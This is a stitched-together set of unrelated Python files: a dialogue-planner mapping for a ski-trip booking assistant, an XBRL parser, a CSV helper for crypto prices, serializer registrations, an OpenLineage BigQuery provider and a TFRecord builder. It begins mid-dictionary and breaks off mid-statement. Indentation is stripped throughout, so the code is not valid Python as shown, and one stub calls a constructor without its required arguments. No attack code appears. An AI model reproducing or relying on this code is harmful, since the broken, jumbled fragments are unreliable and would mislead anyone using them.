"NegatedAtom forced-followup(dialogue-change_option)",
"NegatedAtom have-location(dst)",
"NegatedAtom have-location(src)",
"NegatedAtom have-travel_dates(dates)",
"NegatedAtom ok-travel()",
],
"0x99117d0": [
"NegatedAtom forced-followup(system)",
"Atom maybe-have-location(src)",
"NegatedAtom forced-followup(dialogue)",
"NegatedAtom forced-followup(dialogue-change_option)",
"Atom have-location(dst)",
"NegatedAtom have-location(src)",
"Atom have-travel_dates(dates)",
"NegatedAtom ok-travel()",
],
"0x9905388": [
"NegatedAtom forced-followup(system)",
"Atom maybe-have-location(src)",
"NegatedAtom forced-followup(dialogue)",
"NegatedAtom forced-followup(dialogue-change_option)",
"NegatedAtom have-location(dst)",
"NegatedAtom have-location(src)",
"Atom have-travel_dates(dates)",
"NegatedAtom ok-travel()",
],
"0x9911db0": [
"NegatedAtom forced-followup(system)",
"NegatedAtom maybe-have-location(src)",
"Atom followup-reason(msg-affirm)",
"Atom forced-followup(dialogue)",
"NegatedAtom forced-followup(dialogue-change_option)",
"Atom have-location(dst)",
"Atom have-location(src)",
"Atom have-travel_dates(dates)",
"NegatedAtom ok-travel()",
],
"0x99168c0": [
"NegatedAtom forced-followup(system)",
"Atom maybe-have-location(src)",
"Atom forced-followup(dialogue)",
"Atom followup-reason(err-bad_location)",
"NegatedAtom forced-followup(dialogue-change_option)",
"NegatedAtom have-location(dst)",
"NegatedAtom have-location(src)",
"Atom have-travel_dates(dates)",
"NegatedAtom ok-travel()",
],
},
}
action_mapping = {
"---": "GOAL ACHIEVED",
"system-book_trip ": "(system) <book-trip>",
"dialogue-followup warn-no_weather": "(dial) Hovor: It looks like the weather can't be found at the moment. Proceeding anyways.",
"dialogue-ask_location src": "(dial) Hovor: Where will you be traveling from?",
"dialogue-ask_location dst": "(dial) Hovor: Where do you want to go to?",
"dialogue-ask-to-change err-bad_weather": "(dial) Hovor: The weather will be bad. Is there any part of the trip you'd like to change?",
"web-lookup_weather dst": "(web) <lookup-weather for dst>",
"web-lookup_travel ": "(web) <lookup-travel-dates>",
"dialogue-ask_dates dates": "(dial) Hovor: What dates would you like to travel?",
"dialogue-followup err-bad_dates": "(dial) Hovor: Sorry, but I can't recognize what those dates are.",
"dialogue-followup err-bad_location": "(dial) Hovor: That doesn't seem to be a valid location.",
"dialogue-ask-to-change err-bad_dates_for_travel": "(dial) Hovor: Sorry, but those dates aren't good for the travel you're hoping for. Is there any part of the trip you'd like to change?",
"dialogue-confirm_location src": "(dial) Hovor: Is it <src> that you will be traveling from?",
"system-assess_initial_data ": "(dial) Hovor: Hello, what ski trip would you like?",
"dialogue-followup msg-affirm": "(dial) Hovor: Got it!"
}
intent_info_mapping = {
"system-assess_initial_data ": OrderedDict([
("intent1", "<init-setting-1>"),
("intent2", "<init-setting-2>"),
("intent3", "<init-setting-3>"),
("intent4", "<init-setting-4>"),
("intent5", "<init-setting-5>"),
("intent6", "<init-setting-6>"),
("intent7", "<init-setting-7>"),
("intent8", "<init-setting-8>"),
("intent9", "<init-setting-9>"),
("intent10", "<init-setting-10>"),
("intent11", "<init-setting-11>"),
("intent12", "<init-setting-12>"),
]),
"dialogue-ask_dates dates": OrderedDict([
("intent1", "<good response> Ernesto: From Feb 21 - 27"),
("intent2", "<bad response> Ernesto: My spoon is too big!"),
]),
"dialogue-followup err-bad_location": OrderedDict([
("intent1", "<single outcome>"),
]),
"dialogue-confirm_location src": OrderedDict([
("intent1", "<positive response> Ernesto: Yep!"),
("intent2", "<negative response> Ernesto: No way!"),
("intent3", "<negative plus info> Ernesto: No, it will be New York."),
("intent4", "<bad response> Ernesto: I like butterflies."),
]),
"dialogue-followup warn-no_weather": OrderedDict([
("intent1", "<single outcome>"),
]),
"dialogue-followup err-bad_dates": OrderedDict([
("intent1", "<single outcome>"),
]),
"dialogue-ask-to-change err-bad_weather": OrderedDict([
("intent1", "<change-setting-1> Ernesto: No"),
("intent2", "<change-setting-2> Ernesto: Yes"),
("intent3", "<change-setting-3>"),
("intent4", "<change-setting-4>"),
("intent5", "<change-setting-5>"),
("intent6", "<change-setting-6>"),
("intent7", "<change-setting-7>"),
("intent8", "<change-setting-8>"),
]),
"web-lookup_weather dst": OrderedDict([
("intent1", "<good weather>"),
("intent2", "<bad weather>"),
("intent3", "<service down>"),
]),
"dialogue-ask_location src": OrderedDict([
("intent1", "<good response> Ernesto: I'll be flying from Boston."),
("intent2", "<bad response> Ernesto: Purple is a fun colour."),
]),
"dialogue-ask_location dst": OrderedDict([
("intent1", "<good response> Ernesto: I want to go to Whistler."),
("intent2", "<bad response> Ernesto: Where is my hat?"),
]),
"dialogue-ask-to-change err-bad_dates_for_travel": OrderedDict([
("intent1", "<change-setting-1>"),
("intent2", "<change-setting-2> Ernesto: Yes"),
("intent3", "<change-setting-3>"),
("intent4", "<change-setting-4> Ernesto: No"),
("intent5", "<change-setting-5>"),
("intent6", "<change-setting-6>"),
("intent7", "<change-setting-7>"),
("intent8", "<change-setting-8>"),
]),
"web-lookup_travel ": OrderedDict([
("intent1", "<good travel>"),
("intent2", "<bad dates for travel>"),
]),
"system-book_trip ": OrderedDict([
("intent1", "<single outcome>"),
]),
"dialogue-followup msg-affirm": OrderedDict([
("intent1", "<single outcome>"),
]),
}
context_entity_info_mapping = {
"system-assess_initial_data ": [
"I will travel from $src to $dst on $dates",
"skiing in $dst",
"skiing at $dst",
"I want ski from $dates-from to $dates-to"
"I will travel from $src to $dst.",
"I will fly from $src.",
"I will fly to $dst.",
"I would like to go skiing between $dates",
],
}
def get_scope(name):
if '---' == name:
return 'system'
return name.split('-')[0]
def get_domain():
return {
"types": {
"location": "sys-location",
"travel_dates": "sys-date_range"
},
"entities": {
"dst": "location",
"src": "location",
"dates": "travel_dates"
},
"entity_configs": {
"dst":{},
"src": {},
"dates": {},
}
}
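# Example (illustrative): get_scope() keys an action off its prefix, so
# get_scope("dialogue-ask_location src") -> "dialogue" and
# get_scope("---") -> "system".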
|
# AUTOGENERATED! DO NOT EDIT! File to edit: 01_01_Download_SEC_Data.ipynb (unless otherwise specified).
__all__ = []
|
import pandas as pd
a = pd.read_csv('../data/annotationdetclsconvfnl_v3.csv')
path = 'F:\\医学数据集\\LUNA\\rowfile\\subset5'
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Jan 30 09:40:44 2018
@author: niels-peter
"""
__title__ = 'xbrl_ai'
__version__ = '0.0.4'
__author__ = 'Niels-Peter Rønmos'
from xml.etree.ElementTree import fromstring
from xmljson import badgerfish as bf
import collections
def xbrlinstance_to_dict(xbrlinstance):
"""
Transforming an XBRL instance into a Python dictionary
"""
# From XBRL to dict
xbrldict = bf.data(fromstring(xbrlinstance))['{http://www.xbrl.org/2003/instance}xbrl']
# Extract unit information
unitlist = {}
unit = xbrldict['{http://www.xbrl.org/2003/instance}unit']
if isinstance(unit, list):
for post in unit:
try:
unitlist[post['@id']] = (post['{http://www.xbrl.org/2003/instance}measure'])['$']
except LookupError:
pass
try:
divide = post['{http://www.xbrl.org/2003/instance}divide']
unitlist[post['@id']] = ((divide['{http://www.xbrl.org/2003/instance}unitNumerator'])['{http://www.xbrl.org/2003/instance}measure'])['$'] + '/'\
+ ((divide['{http://www.xbrl.org/2003/instance}unitDenominator'])['{http://www.xbrl.org/2003/instance}measure'])['$']
except LookupError:
pass
elif isinstance(unit, dict):
try:
unitlist[unit['@id']] = (unit['{http://www.xbrl.org/2003/instance}measure'])['$']
except LookupError:
pass
try:
divide = unit['{http://www.xbrl.org/2003/instance}divide']
unitlist[unit['@id']] = ((divide['{http://www.xbrl.org/2003/instance}unitNumerator'])['{http://www.xbrl.org/2003/instance}measure'])['$'] + '/'\
+ ((divide['{http://www.xbrl.org/2003/instance}unitDenominator'])['{http://www.xbrl.org/2003/instance}measure'])['$']
except LookupError:
pass
# Extract context information
contexts = xbrldict['{http://www.xbrl.org/2003/instance}context']
contextlist = {}
for post in contexts:
identifier = scheme = startdate = enddate\
= instant = explicit = typed = None
entity = post['{http://www.xbrl.org/2003/instance}entity']
for element in entity:
try:
identifier = (entity[element])['$']
scheme = (entity[element])['@scheme']
except LookupError:
pass
try:
explicit = (entity['{http://www.xbrl.org/2003/instance}segment'])\
['{http://xbrl.org/2006/xbrldi}explicitMember']
except LookupError:
pass
try:
typed = (entity['{http://www.xbrl.org/2003/instance}segment'])\
['{http://xbrl.org/2006/xbrldi}typedMember']
except LookupError:
pass
period = post['{http://www.xbrl.org/2003/instance}period']
try:
startdate\
= (period['{http://www.xbrl.org/2003/instance}startDate'])['$']
except LookupError:
startdate = None
try:
enddate\
= (period['{http://www.xbrl.org/2003/instance}endDate'])['$']
except LookupError:
enddate = None
try:
instant\
= (period['{http://www.xbrl.org/2003/instance}instant'])['$']
except LookupError:
instant = None
try:
explicit = (post['{http://www.xbrl.org/2003/instance}scenario'])\
['{http://xbrl.org/2006/xbrldi}explicitMember']
except LookupError:
pass
try:
typed = (post['{http://www.xbrl.org/2003/instance}scenario'])\
['{http://xbrl.org/2006/xbrldi}typedMember']
except LookupError:
pass
contextlist[post['@id']] = [identifier,\
scheme, startdate, enddate, instant, explicit, typed]
for opryd in ('{http://www.xbrl.org/2003/instance}context',
'{http://www.xbrl.org/2003/instance}unit'):
del xbrldict[opryd]
def modificer_xbrl(xbrldict1):
xbrldict2 = {}
modified = False
for concept in xbrldict1:
if isinstance(xbrldict1[concept], list):
for i in range(0, len(xbrldict1[concept])):
for u in xbrldict1[concept][i]:
type_list = type(xbrldict1[concept][i][u]).__name__
break
if type_list not in ('OrderedDict', 'list'):
xbrldict2[concept] = xbrldict1[concept]
elif type_list in ('OrderedDict', 'list'):
for u in xbrldict1[concept][i]:
modified = True
xbrldict2[u] = xbrldict1[concept][i][u]
else:
pass
elif isinstance(xbrldict1[concept], dict):
for i in xbrldict1[concept].keys():
type_in_dict = type(xbrldict1[concept][i]).__name__
break
if type_in_dict not in ('OrderedDict', 'list'):
xbrldict2[concept] = xbrldict1[concept]
elif type_in_dict == 'list':
for u in xbrldict1[concept]:
modified = True
xbrldict2[u] = xbrldict1[concept][u]
elif type_in_dict == 'OrderedDict':
for u in xbrldict1[concept].keys():
modified = True
xbrldict2[u] = xbrldict1[concept][u]
else:
pass
else:
xbrldict2[concept] = xbrldict1[concept]
return xbrldict2, modified
andret = True
while andret == True:
xbrldict, andret = modificer_xbrl(xbrldict)
# Add unit and context information to concepts
for concept in xbrldict:
if isinstance(xbrldict[concept], dict):
try:
(xbrldict[concept])['context']\
= contextlist[(xbrldict[concept])['@contextRef']]
except LookupError:
pass
try:
(xbrldict[concept])['unit']\
= unitlist[(xbrldict[concept])['@unitRef']]
except LookupError:
pass
if isinstance(xbrldict[concept], list):
for i in range(0, len(xbrldict[concept])):
try:
((xbrldict[concept])[i])['context']\
= contextlist[((xbrldict[concept])[i])['@contextRef']]
except LookupError:
pass
try:
((xbrldict[concept])[i])['unit']\
= unitlist[((xbrldict[concept])[i])['@unitRef']]
except LookupError:
pass
return xbrldict
def xbrldict_to_xbrl_54(xbrldict):
def get_xbrlkey(post, char):
return post[post.index(char)+1:]
def explicit_list(explicit):
explicit_liste = {}
dimension_list = []
label_extend = ''
if type(explicit).__name__ == 'OrderedDict':
explicit_liste[get_xbrlkey(explicit['@dimension'], ":")]\
= get_xbrlkey(explicit['$'], ":")
if isinstance(explicit, list):
for element in explicit:
explicit_liste[get_xbrlkey(element['@dimension'], ":")]\
= get_xbrlkey(element['$'], ":")
explicit_liste_od = collections.OrderedDict(sorted(explicit_liste.items()))
for keys in explicit_liste_od:
label_extend = label_extend + '_' + explicit_liste_od[keys]
dimension_list.append(keys)
return label_extend, dimension_list
def typed_list(typed):
typed_liste = {}
dimension_list = []
label_typed = label_typed_id = ''
if type(typed).__name__ == 'OrderedDict':
for poster in typed:
if poster == '@dimension':
dimension = get_xbrlkey(typed['@dimension'], ":")
if poster != '@dimension':
vaerdi = (typed[poster]).get('$', None)
member = get_xbrlkey(poster, "}")
typed_liste[dimension, vaerdi] = member
if type(typed).__name__ == 'list':
for element in typed:
for poster in element:
if poster == '@dimension':
dimension = get_xbrlkey(element['@dimension'], ":")
if poster != '@dimension':
vaerdi = (element[poster]).get('$', None)
member = get_xbrlkey(poster, "}")
typed_liste[dimension, vaerdi] = member
typed_liste_od = collections.OrderedDict(sorted(typed_liste.items()))
for keys in typed_liste_od:
dimension_list.append(keys[0])
label_typed = label_typed + '_' + typed_liste_od[keys]
if label_typed_id == '':
label_typed_id = str(keys[1])
else:
label_typed_id = label_typed_id + '|' + str(keys[1])
return label_typed, label_typed_id, dimension_list
def concept_data(inputdata):
value = inputdata.get('$', None)
unit = inputdata.get('unit', None)
decimals = inputdata.get('@decimals', None)
context = inputdata['context']
lang = inputdata.get('@{http://www.w3.org/XML/1998/namespace}lang', None)
if type(lang).__name__ != 'NoneType':
lang = 'lang:' + lang
startdate = context[2]
enddate = context[3]
instant = context[4]
if type(enddate).__name__ != 'str':
enddate = instant
explicit = context[5]
typed = context[6]
label_extend, dimension_list_extend = explicit_list(explicit)
label_typed, label_typed_id, dimension_list_typed = typed_list(typed)
dimension_list_extend.extend(dimension_list_typed)  # merge typed dims into the explicit-dimension list
if label_typed_id == '':
label_typed_id = None
return value, unit, decimals, startdate, enddate, lang,\
label_extend, label_typed, label_typed_id, dimension_list_extend
#schemaRef = (XBRL['{http://www.xbrl.org/2003/linkbase}schemaRef'])\
#['@{http://www.w3.org/1999/xlink}href']
dict54 = {}
for post in xbrldict:
if post not in ('{http://www.xbrl.org/2003/linkbase}schemaRef',
'@{http://www.w3.org/2001/XMLSchema-instance}schemaLocation'):
ref = post[:post.index('}')]
xbrlref = ref[(ref.rfind('/') - len(ref) + 1):]
if type(xbrldict[post]).__name__ == 'list':
for element in xbrldict[post]:
if element.get('context', 'missing') != 'missing':
value, unit, decimals, startdate, enddate, lang, label_extend,\
label_typed, label_typed_id, dimension_list = concept_data(element)
concept = xbrlref + ':' + get_xbrlkey(post, '}') + label_extend + label_typed
if type(unit).__name__ == 'NoneType':
unit = lang
nogle = (concept, startdate, enddate, label_typed_id, unit)
if nogle in dict54 and dict54[nogle][0] != value:
print('!!!!!!!!!', nogle, value, unit, decimals, dict54[nogle])
if len(str(dimension_list)) < 5:
dimension_list = None
dict54[nogle] = [value, unit, decimals, dimension_list]
if type(xbrldict[post]).__name__ == 'OrderedDict':
if (xbrldict[post]).get('context', 'missing') != 'missing':
value, unit, decimals, startdate, enddate, lang, label_extend, label_typed,\
label_typed_id, dimension_list = concept_data(xbrldict[post])
concept = xbrlref + ':' + get_xbrlkey(post, '}') + label_extend + label_typed
if type(unit).__name__ == 'NoneType':
unit = lang
nogle = (concept, startdate, enddate, label_typed_id, unit)
if nogle in dict54 and dict54[nogle][0] != value:
print('!!!!!!!!!', nogle, value, unit, decimals, dict54[nogle])
if len(str(dimension_list)) < 5:
dimension_list = None
dict54[nogle] = [value, unit, decimals, dimension_list]
if post in ('{http://www.xbrl.org/2003/linkbase}schemaRef',
'@{http://www.w3.org/2001/XMLSchema-instance}schemaLocation'):
dict54[post] = xbrldict[post]
return dict54
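# Usage sketch (the file name is illustrative): flatten an XBRL instance
# document into the "54" key/value layout built above.
#   with open('instance.xml', 'rb') as fp:
#       xbrldict = xbrlinstance_to_dict(fp.read())
#   flat = xbrldict_to_xbrl_54(xbrldict)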
|
import database.src.language.insert.LanguageSource
import database.src.language.insert.Inserter
class Main(object):
def __init__(self, data, client):
self.__data = data
self.__client = client
self.__source = database.src.language.insert.LanguageSource.LanguageSource()
self.__inserter = database.src.language.insert.Inserter.Inserter(self.__data)
def Run(self):
self.__inserter.Insert(self.__source.Get())
if __name__ == "__main__":
m = Main()
m.Run()
|
#!/usr/bin/env python3
import sys
import random
import functools
HELP_MSG = """
Usage: tools/generate_test_data.py FROM_IDX END_IDX 'CALLBACK'
Examples:
> tools/generate_test_data.py 2 20 '\"{} {}\".format(i, \" \".join(list(map(str, range(3, i * 2)))))'
2 3
3 3 4 5
4 3 4 5 6 7
5 3 4 5 6 7 8 9
...
> tools/generate_test_data.py 0 200 '"{} {}".format(i, " ".join(map(str, random.sample(rng(200000), 10))))'
0 165071 69526 51919 146370 22430 179599 183854 171458 38744 62598
1 84871 61983 82583 196561 72424 161388 36854 109100 153300 199365
...
"""
@functools.lru_cache(maxsize=1000)
def rng(*args):
return list(range(*args))
def main(callback_str):
callback_str = "lambda i: " + callback_str
callback = eval(callback_str)
for i in range(start, end):
print(callback(i))
if __name__ == '__main__':
if len(sys.argv) < 4:
print(HELP_MSG)
else:
start = int(sys.argv[1])
end = int(sys.argv[2])
callback_str = sys.argv[3]
main(callback_str)
|
import csv
class csv_generator:
def __init__(self):
# csv header
fieldnames = ['crypto', 'price','potential_yield']
self.dictionnary_list = []
while(True):
self.generate_dictionnary()
if input("Do you have more (Y)es or (N)o :") in ['N','n']:
break
with open('supports.csv', 'w', encoding='UTF8', newline='') as f:
writer = csv.DictWriter(f, fieldnames=fieldnames)
writer.writeheader()
writer.writerows(self.dictionnary_list)
def generate_dictionnary(self) -> None:
crypto = input("crypto :")
price = input("price :")
potential_yield = input("potential_yield in % :")
try:
self.dictionnary_list.append({'crypto': str(crypto),'price': float(price),'potential_yield': 1+float(potential_yield)/100})
except Exception as error:
print(f"Wrong input format {error}")
class csv_reader:
def __init__(self):
pass
def file_to_dict_list(self) -> list[dict]:
supports=[]
with open('supports.csv', newline='') as csvfile:
reader = csv.DictReader(csvfile)
for row in reader:
supports.append(row)
return supports
if __name__=="__main__":
print(csv_reader().file_to_dict_list())
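# Example supports.csv written by csv_generator (values are illustrative; a
# potential_yield entered as 10 is stored as 1.1):
#   crypto,price,potential_yield
#   BTC,27000.0,1.1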
|
def domino_piling(m, n):
return (m * n) // 2
# Test cases:
print(domino_piling(3, 3))
print(domino_piling(2, 4))
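# Each 2x1 domino covers two cells, so floor(m*n/2) dominoes always fit on an
# m x n board; both test cases above therefore print 4.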
|
from decimal import Decimal
from future.moves.urllib.parse import ParseResult
from collections import OrderedDict
from enum import Enum
from uuid import UUID
from datetime import date, datetime, time
from attr._compat import iteritems
from .functions import to_dict
from .types import (
TypedSequence, TypedMapping, TypedSet, DEFAULT_DATE_FORMAT,
DEFAULT_DATETIME_FORMAT, DEFAULT_TIME_FORMAT
)
@to_dict.register(list) # noqa F811
@to_dict.register(set)
@to_dict.register(tuple)
def _(obj, **kwargs):
suppress_empty_values = kwargs.get("suppress_empty_values", False)
retain_collection_types = kwargs.get("retain_collection_types", False)
if not suppress_empty_values or len(obj):
cf = obj.__class__ if retain_collection_types else list
return cf([to_dict(i, **kwargs) for i in obj])
@to_dict.register(dict) # noqa F811
def _(obj, **kwargs):
suppress_empty_values = kwargs.get("suppress_empty_values", False)
dict_factory = kwargs.get("dict_factory", OrderedDict)
items = []
for kk, vv in iteritems(obj):
vv = to_dict(vv, **kwargs)
if (not suppress_empty_values) or (vv is not None):
items.append((to_dict(kk, **kwargs), vv))
if not suppress_empty_values or len(items):
return dict_factory(items)
@to_dict.register(TypedSequence) # noqa F811
def _(obj, **kwargs):
return to_dict(obj.list, **kwargs)
@to_dict.register(TypedSet) # noqa F811
def _(obj, **kwargs):
return to_dict(obj.set, **kwargs)
@to_dict.register(TypedMapping) # noqa F811
def _(obj, **kwargs):
suppress_map_key_values = kwargs.get("suppress_map_key_values", False)
suppress_empty_values = kwargs.get("suppress_empty_values", False)
rv = kwargs.get("dict_factory", OrderedDict)()
items = obj.items()
for key_value, item in items:
sub_dict = to_dict(item, **kwargs)
if suppress_map_key_values:
sub_dict.pop(obj.key)
rv[key_value] = sub_dict
if not suppress_empty_values or len(items):
return rv
@to_dict.register(Enum) # noqa F811
def _(obj, **kwargs):
return obj.value
@to_dict.register(UUID) # noqa F811
def _(obj, **kwargs):
return str(obj)
@to_dict.register(ParseResult) # noqa F811
def _(obj, **kwargs):
return obj.geturl()
@to_dict.register(date) # noqa F811
def _(obj, **kwargs):
formatter = kwargs.get('formatter') or DEFAULT_DATE_FORMAT
return obj.strftime(formatter)
@to_dict.register(datetime) # noqa F811
def _(obj, **kwargs):
formatter = kwargs.get('formatter') or DEFAULT_DATETIME_FORMAT
return (obj.isoformat() if formatter == "ISO_FORMAT"
else obj.strftime(formatter))
@to_dict.register(time) # noqa F811
def _(obj, **kwargs):
formatter = kwargs.get('formatter') or DEFAULT_TIME_FORMAT
return obj.strftime(formatter)
@to_dict.register(Decimal) # noqa F811
def _(obj, **kwargs):
return str(obj)
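# A hedged sketch of how a further type could be registered with the same singledispatch
# pattern used above (hypothetical example; `complex` is not handled by this module):
#
# @to_dict.register(complex)  # noqa F811
# def _(obj, **kwargs):
#     return {"real": obj.real, "imag": obj.imag}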
|
# SPDX-License-Identifier: Apache-2.0.
import json
import logging
import traceback
import attr
from typing import Tuple, Optional, Dict, List
from google.cloud.bigquery import Client
from openlineage.common.dataset import Dataset, Source
from openlineage.common.models import DbTableSchema, DbColumn
from openlineage.common.schema import GITHUB_LOCATION
from openlineage.common.sql import DbTableMeta
from openlineage.common.utils import get_from_nullable_chain
from openlineage.client.facet import BaseFacet, OutputStatisticsOutputDatasetFacet, \
ExternalQueryRunFacet
_BIGQUERY_CONN_URL = 'bigquery'
@attr.s
class BigQueryErrorRunFacet(BaseFacet):
"""
Represents errors that can happen during execution of BigqueryExtractor
:param clientError: represents errors originating in bigquery client
:param parserError: represents errors that happened during parsing SQL provided to bigquery
"""
clientError: str = attr.ib(default=None)
parserError: str = attr.ib(default=None)
@staticmethod
def _get_schema() -> str:
return GITHUB_LOCATION + "bq-error-run-facet.json"
@attr.s
class BigQueryJobRunFacet(BaseFacet):
"""
Facet that represents relevant statistics of bigquery run.
:param cached: bigquery caches query results. Rest of the statistics will not be provided
for cached queries.
:param billedBytes: how many bytes bigquery bills for.
:param properties: full property tree of bigquery run.
"""
cached: bool = attr.ib()
billedBytes: int = attr.ib(default=None)
properties: str = attr.ib(default=None)
@staticmethod
def _get_schema() -> str:
return GITHUB_LOCATION + "bq-statistics-run-facet.json"
@attr.s
class BigQueryStatisticsDatasetFacet(BaseFacet):
"""
Facet that represents statistics of output dataset resulting from bigquery run.
:param outputRows: how many rows query produced.
:param size: size of output dataset in bytes.
"""
rowCount: int = attr.ib()
size: int = attr.ib()
def to_openlineage(self) -> OutputStatisticsOutputDatasetFacet:
return OutputStatisticsOutputDatasetFacet(
rowCount=self.rowCount,
size=self.size
)
@staticmethod
def _get_schema() -> str:
return GITHUB_LOCATION + "bq-statistics-dataset-facet.json"
@attr.s
class BigQueryFacets:
run_facets: Dict[str, BaseFacet] = attr.ib()
inputs: List[Dataset] = attr.ib()
output: Optional[Dataset] = attr.ib(default=None)
class BigQueryDatasetsProvider:
def __init__(
self,
client: Optional[Client] = None,
logger: Optional[logging.Logger] = None
):
self.client = client
if client is None:
self.client = Client()
self.logger = logger
if logger is None:
self.logger = logging.getLogger(__name__)
def get_facets(self, job_id: str) -> BigQueryFacets:
inputs = []
output = None
run_facets = {}
try:
try:
job = self.client.get_job(job_id=job_id)
props = job._properties
run_stat_facet, dataset_stat_facet = self._get_output_statistics(props)
run_facets.update({
"bigQuery_job": run_stat_facet,
"externalQuery": ExternalQueryRunFacet(
externalQueryId=job_id, source="bigquery"
)
})
inputs = self._get_input_from_bq(props)
output = self._get_output_from_bq(props)
if output and dataset_stat_facet:
output.custom_facets.update({
"stats": dataset_stat_facet
})
output.output_facets.update({
'outputStatistics': dataset_stat_facet.to_openlineage()
})
finally:
# Ensure client has close() defined, otherwise ignore.
# NOTE: close() was introduced in python-bigquery v1.23.0
if hasattr(self.client, "close"):
self.client.close()
except Exception as e:
self.logger.error(
f"Cannot retrieve job details from BigQuery.Client. {e}",
exc_info=True
)
run_facets.update({
"bigQuery_error": BigQueryErrorRunFacet(
clientError=f"{e}: {traceback.format_exc()}",
)
})
return BigQueryFacets(run_facets, inputs, output)
def _get_output_statistics(self, properties) \
-> Tuple[BigQueryJobRunFacet, Optional[BigQueryStatisticsDatasetFacet]]:
stages = get_from_nullable_chain(properties, ['statistics', 'query', 'queryPlan'])
json_props = json.dumps(properties)
if not stages:
if get_from_nullable_chain(properties, ['statistics', 'query', 'statementType']) \
in ['CREATE_VIEW', 'CREATE_TABLE', 'ALTER_TABLE']:
return BigQueryJobRunFacet(cached=False), None
# we're probably getting cached results
if get_from_nullable_chain(properties, ['statistics', 'query', 'cacheHit']):
return BigQueryJobRunFacet(cached=True), None
if get_from_nullable_chain(properties, ['status', 'state']) != "DONE":
raise ValueError("Trying to extract data from running bigquery job")
raise ValueError(
f"BigQuery properties did not have required data: queryPlan - {json_props}"
)
out_stage = stages[-1]
out_rows = out_stage.get("recordsWritten", None)
out_bytes = out_stage.get("shuffleOutputBytes", None)
billed_bytes = get_from_nullable_chain(properties, [
'statistics', 'query', 'totalBytesBilled'
])
return BigQueryJobRunFacet(
cached=False,
billedBytes=int(billed_bytes) if billed_bytes else None,
properties=json_props
), BigQueryStatisticsDatasetFacet(
rowCount=int(out_rows),
size=int(out_bytes)
) if out_bytes and out_rows else None
def _get_input_from_bq(self, properties):
bq_input_tables = get_from_nullable_chain(properties, [
'statistics', 'query', 'referencedTables'
])
if not bq_input_tables:
return []
input_table_names = [
self._bq_table_name(bq_t) for bq_t in bq_input_tables
]
sources = [
self._source() for bq_t in bq_input_tables
]
try:
return [
Dataset.from_table_schema(
source=source,
table_schema=table_schema
)
for table_schema, source in zip(self._get_table_schemas(
input_table_names
), sources)
]
except Exception as e:
self.logger.warning(f'Could not extract schema from bigquery. {e}')
return [
Dataset.from_table(source, table)
for table, source in zip(input_table_names, sources)
]
def _get_output_from_bq(self, properties) -> Optional[Dataset]:
bq_output_table = get_from_nullable_chain(properties, [
'configuration', 'query', 'destinationTable'
])
if not bq_output_table:
return None
output_table_name = self._bq_table_name(bq_output_table)
source = self._source()
table_schema = self._get_table_safely(output_table_name)
if table_schema:
return Dataset.from_table_schema(
source=source,
table_schema=table_schema,
)
else:
self.logger.warning("Could not resolve output table from bq")
return Dataset.from_table(source, output_table_name)
def _get_table_safely(self, output_table_name):
try:
return self._get_table(output_table_name)
except Exception as e:
self.logger.warning(f'Could not extract output schema from bigquery. {e}')
return None
def _get_table_schemas(self, tables: List[str]) -> List[DbTableSchema]:
# Avoid querying BigQuery by returning an empty array
# if no tables have been provided.
if not tables:
return []
return [self._get_table(table) for table in tables]
def _get_table(self, table: str) -> Optional[DbTableSchema]:
bq_table = self.client.get_table(table)
if not bq_table._properties:
return
table = bq_table._properties
fields = get_from_nullable_chain(table, ['schema', 'fields'])
if not fields:
return
columns = [DbColumn(
name=field.get('name'),
type=field.get('type'),
description=field.get('description'),
ordinal_position=i
) for i, field in enumerate(fields)]
return DbTableSchema(
schema_name=table.get('tableReference').get('projectId') + '.' +
table.get('tableReference').get('datasetId'),
table_name=DbTableMeta(table.get('tableReference').get('tableId')),
columns=columns
)
def _source(self) -> Source:
return Source(
scheme='bigquery',
connection_url='bigquery'
)
def _bq_table_name(self, bq_table):
project = bq_table.get('projectId')
dataset = bq_table.get('datasetId')
table = bq_table.get('tableId')
return f"{project}.{dataset}.{table}"
|
'''
Usage
python tools/create-tfrecord.py train --data_dir=data/voc2012_raw/VOCdevkit/VOC2012/ \
--output_file=data/train.tfrecord \
--classes=data/voc2012.names
python tools/create-tfrecord.py --data_dir data/cervix/colpo \
--output_file data/colpo.tfrecord \
--classes data/cervix-colpo.names --log_level info
'''
import time
import os
import hashlib
import json
from os import listdir
from absl import app, flags, logging
from absl.flags import FLAGS
import tensorflow as tf
import tqdm
import skimage.io
flags.DEFINE_string('data_dir', './data/voc2012_raw/VOCdevkit/VOC2012/',
'path to raw PASCAL VOC dataset')
flags.DEFINE_string(
'output_file', './data/train.tfrecord', 'output dataset')
flags.DEFINE_string('classes', './data/voc2012.names', 'classes file')
flags.DEFINE_enum('log_level', 'info', [
'info', 'debug'], 'log_level mode; debug/info')
def _get_height_width(img_path):
image = skimage.io.imread(img_path)
height, width = image.shape[:2]
logging.debug('height, width: [%d %d]', height, width)
return height, width
def _get_bbox(coordinates, height, width):
xmin = 0.0
ymin = 0.0
xmax = 0.0
ymax = 0.0
if 0 == len(coordinates):
logging.warning('input coordinate size is zero')
else:
all_point_x = []
all_point_y = []
for polygon in coordinates:  # renamed from `set` to avoid shadowing the built-in
for point in polygon:
all_point_x.append(int(point[0]))
all_point_y.append(int(point[1]))
xmin = float(min(all_point_x) / width)
ymin = float(min(all_point_y) / height)
xmax = float(max(all_point_x) / width)
ymax = float(max(all_point_y) / height)
logging.debug('bbox: [%f %f %f %f]', xmin, ymin, xmax, ymax)
return xmin, ymin, xmax, ymax
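# Worked example (hypothetical numbers): for a single polygon [[(10, 20), (50, 80)]] on a
# 100x200 (height x width) image, the normalized box is
#   _get_bbox([[(10, 20), (50, 80)]], height=100, width=200) == (0.05, 0.2, 0.25, 0.8)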
def build_example(type_, annotation, path, filename, img_format, class_map):
logging.debug('type: {}'.format(type_))
assert type_ in ["train", "val", "test"]
if img_format not in [".jpg", ".jpeg", ".png"]:
logging.warning("image(%s) is not supperted format(%s)",
filename, img_format)
return None
filename += img_format
img_path = os.path.join(path, filename)
with open(img_path, 'rb') as img_file:
img_raw = img_file.read()
key = hashlib.sha256(img_raw).hexdigest()
height, width = _get_height_width(img_path)
xmin = []
ymin = []
xmax = []
ymax = []
classes = []
classes_text = []
if "test" == type_:
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': tf.train.Feature(int64_list=tf.train.Int64List(value=[height])),
'image/width': tf.train.Feature(int64_list=tf.train.Int64List(value=[width])),
'image/filename': tf.train.Feature(bytes_list=tf.train.BytesList(value=[
filename.encode('utf8')])),
'image/source_id': tf.train.Feature(bytes_list=tf.train.BytesList(value=[
